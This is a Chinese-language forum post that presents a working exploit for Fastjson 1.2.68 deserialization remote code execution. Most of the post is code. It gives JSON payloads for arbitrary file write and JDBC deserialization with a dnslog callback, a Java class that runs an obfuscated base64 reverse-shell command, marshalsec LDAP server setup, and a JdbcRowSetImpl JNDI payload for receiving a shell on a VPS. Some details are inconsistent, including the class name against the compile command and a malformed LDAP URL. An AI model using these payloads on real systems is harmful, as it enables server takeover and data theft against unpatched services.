Fastjson 1.2.68 反序列化RCE

POC Fastjson 1.2.68 反序列化RCE

Shacker已验证会员

黑客倉庫站長

贡献: 21%
Python:
## 漏洞概述

在Fastjson<=1.2.68的版本中,通过新的Gadgets绕过autoType开关,在autoType关闭的情况下仍然可以绕过黑白名单防御机制,通过反序列化漏洞在服务器上执行任意代码

## 影响范围

Fastjson爆出的绕过方法可以通杀 1.2.68 以下所有版本

```http
Fastjson <= 1.2.68
```

## POC

任意文件写入POC

```http
{"x":{"@type":"java.lang.AutoCloseable","@type":"sun.rmi.server.MarshalOutputStream","out":{"@type":"java.util.zip.InflaterOutputStream","out":{"@type":"java.io.FileOutputStream","file":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/charsets.jar","append":false},"infl":{"input":"xxx"},"bufLen":1048576},"protocolVersion":1}}

{"x":{"@type":"java.nio.charset.Charset","val":"500"}}
```

JDBC反序列化POC

```http
{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"172.20.64.40","portToConnectTo":3306,"url":"jdbc:mysql://172.20.64.40:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","databaseToConnectTo":"test","info":{"@type":"java.util.Properties","PORT":"3306","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","user":"yso_URLDNS_http://ahfladhjfd.6fehoy.dnslog.cn","PORT.1":"3306","HOST.1":"172.20.64.40","NUM_HOSTS":"1","HOST":"172.20.64.40","DBNAME":"test"}}
```

## 漏洞利用

1、编译POC

将代码编写为class类文件,并将生成的类文件放在web目录下,启动web服务

```java
public class exec{
    public static void main(String[] args) throws Exception
    {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAveC54LngueC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}").waitFor();
    }
}
//base64 是要执行的命令
```

```bash
#编译
javac POC.java
```

```bash
python3 -m http.server 8001
```

2、配置RMI环境

用marshalsec项目,启动一个RMI服务器,监听9999端口,并加载远程类

下载地址:https://github.com/mbechler/marshalsec

安装maven

```bash
yum install -y maven
```

切换到marshalsec目录下使用maven进行打包,

```bash
mvn clean package -DskipTests
```

3、开启监听

```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://x.x.x.x:9999/#POC
```

备注:http://xx.xx.xx.xx:9999/#POC 是放Java类的地址,类只要写名字即可,不需要加.class,其次类名前要加#

4、反弹shell

把网站json数据包替换,然后发包,VPS即可收到

```http
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap:// http://xx.xx.xx.xx:9999/#POC ","autoCommit":true}}}
```
 
后退
顶部